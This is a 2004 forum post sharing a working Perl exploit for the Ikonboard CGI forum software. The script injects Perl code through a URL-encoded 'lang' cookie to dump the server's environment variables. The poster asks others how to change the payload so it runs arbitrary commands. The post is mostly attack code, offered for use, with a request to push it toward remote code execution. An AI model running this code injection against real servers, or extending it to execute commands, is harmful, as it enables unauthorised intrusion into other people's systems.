|
|
|
|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 161
Members: 0
Total: 161
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
proof of concept for ikonboard writen in perl. |
|
Posted: Fri Dec 03, 2004 4:58 pm |
|
|
chiche |
Regular user |
|
|
Joined: Nov 11, 2004 |
Posts: 9 |
|
|
|
|
|
|
|
I found a proof of concept for ikonboard:
#!/usr/bin/perl -w
use strict;
my $HOST = 'www.example.com';
my $PORT = 80;
my $PATH = '/cgi-bin/ikonboard.cgi';
my $HEAD = qq|"Content-type: text/plain\r\n\r\n"|;
use IO::Socket;
my $sock = IO::Socket::INET->new("$HOST:$PORT") or die "connect: $!";
my $val =
qq|.\0"if print($HEAD,map"\$_ => \$ENV{\$_}\n",keys\%ENV)&&exit;#|;
$val =~ s#(\W)# sprintf '%%%.2X', ord $1 #ge;
$sock->print(
"GET $PATH HTTP/1.1\r\n",
"Host: $HOST\r\n",
"Cookie: lang=$val\r\n",
"Connection: close\r\n",
"\r\n"
) or die "write: $!";
print while <$sock>;
The exploit works fine, its give me information about the server enviorment.
In the corresponding advisory i read that this can be used to execute arbitrary commands.
I think i have to put them in "if print($HEAD,map"\$ ....
But im not sure and i dont know perl.
PLease if someone can give an example of making some "dir" command or something like that please let me know.
Salu2 desde Uruguay.
chiche.
Fuck the s0ftware patents! |
|
|
|
|
|
www.waraxe.us Forum Index -> Perl
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|